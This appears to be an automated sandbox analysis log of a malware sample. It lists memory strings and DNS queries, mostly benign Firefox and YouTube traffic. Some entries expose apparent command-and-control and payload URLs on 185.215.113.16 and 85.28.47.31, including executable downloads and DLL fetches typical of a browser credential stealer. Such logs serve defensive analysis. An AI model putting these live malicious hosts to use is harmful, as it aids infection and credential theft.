Source: firefox.exe, 00000016.00000003.2932981403.00000189378AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3171769627.00000189378AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3162211301.0000018937D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3359286606.0000018944534000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3357377046.0000018944721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3426007488.0000018945CC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3280386302.0000018945CC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3069241995.00000189317EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3162211301.0000018937D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.comweave:service:start-over equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3015090796.0000020633E70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: indowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDO equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002A.00000002.3013910159.00000197DA1B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: mmonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000003.2764798353.00000271F8EA8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2786986644.00000271F8EA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: neer\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002B.00000002.3012524075.0000020633CB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ogramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowss equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000002.2784283721.00000271F8DF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000002.2784283721.00000271F8DF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ps://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000011.00000002.2786986644.00000271F8E92000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2763656672.00000271F8E8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: d27375200a.exe, 0000000C.00000003.2757724946.00000000021A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: d27375200a.exe, 0000000C.00000003.2757724946.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, d27375200a.exe, 0000000C.00000003.2757913462.0000000002290000.00000004.00000020.00020000.00000000.sdmp, d27375200a.exe, 00000025.00000003.2994466793.00000000021E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set "URL=https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3065632271.0000018935505000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tlsflags0x00000000:www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3174264142.000001893689F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3401318781.000001894708A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3063650465.00000189368A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000016.00000003.3065552835.0000018935747000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2932981403.00000189378AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3073028344.00000189317DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3401318781.000001894708A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.2972414420.0000018935CFC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2878502064.00000189362A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2933839443.0000018935CDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000016.00000003.3073945047.00000189317CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xO^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3384064641.0000018945A72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3382756337.0000018945AC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3356229366.00000189451DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xabout:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3382756337.0000018945AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xe=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.2998039360.0000018931748000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2814824448.0000018931746000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3073945047.00000189317CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000003.3065632271.0000018935505000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xtlsflags0x00000000:www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: mitmdetection.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic	DNS traffic detected: DNS query: twitter.com

Source: unknown

Source: firefox.exe, 00000016.00000003.2976595363.0000018935175000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.000000000043C000.00000040.00000001.01000000.00000009.sdmp, bfb8bb0dc7.exe, 0000000B.00000003.3023289734.0000000022AA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/enter.exe
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.16/mine/enter.exe00Start2ipfncgndfolcbkdeeknbbbnhcc
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/enter.exe16/mine/enter.exemonProxyStub.dll
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exec
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exem
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exep
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.000000000043C000.00000040.00000001.01000000.00000009.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3085256632.00000000026FE000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.0000000002791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.0000000002791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.0000000002791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php#
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php/B
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpG
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.0000000002791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpK
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpU
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpe
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpoamingHJKECAAAFH.exe
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpq
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpv
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000277A000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dlll
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000277A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000277A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll~
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll1
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000277A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll?
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000277A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dllz
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll5
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.000000000046A000.00000040.00000001.01000000.00000009.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: bfb8bb0dc7.exe, 0000000B.00000002.3112755624.0000000022C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3112755624.0000000022C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll~
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.0000000002791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/U
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/hH
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.0000000002791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/u
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.0000000002791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/z
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.000000000043C000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phpoamingHJKECAAAFH.exe
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31:
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31l
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: firefox.exe, 00000016.00000003.3355751970.00000189451FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3359286606.0000018944562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org
Source: firefox.exe, 00000016.00000003.3355751970.00000189451FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/
Source: firefox.exe, 00000016.00000003.3355934859.00000189451EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-android-aarch64-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zi
Source: firefox.exe, 00000016.00000003.3355934859.00000189451EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-android-arm-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zip
Source: firefox.exe, 00000016.00000003.3355934859.00000189451EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-android-x86-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zip
Source: firefox.exe, 00000016.00000003.3355934859.00000189451EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-android-x86_64-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zip
Source: firefox.exe, 00000016.00000003.3355934859.00000189451EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-linux32-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: firefox.exe, 00000016.00000003.3355934859.00000189451EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-linux64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: firefox.exe, 00000016.00000003.3355934859.00000189451EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-macosx64-2e1774ab6dc6c43debb0b5b628bdf122a391d521-2.zip
Source: firefox.exe, 00000016.00000003.3355934859.00000189451EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-macosx64-aarch64-2e1774ab6dc6c43debb0b5b628bdf122a391d521-2
Source: firefox.exe, 00000016.00000003.3355934859.00000189451EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-win32-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: firefox.exe, 00000016.00000003.3357377046.00000189447C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: firefox.exe, 00000016.00000003.3355934859.00000189451EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ciscobinary.openh264.org/openh264-win64-aarch64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
Source: firefox.exe, 00000016.00000003.3066594596.000001893378B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2990608782.000001893377C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: firefox.exe, 00000016.00000003.3426978382.0000018948100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3397921737.00000189470CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: firefox.exe, 00000016.00000003.3364719178.0000018941B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000016.00000003.2976595363.00000189351D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000016.00000003.3364719178.0000018941B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2996892259.00000189317CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3073945047.00000189317CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000016.00000003.3365196247.000001894178C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.2996892259.00000189317CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000003.3073945047.00000189317CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
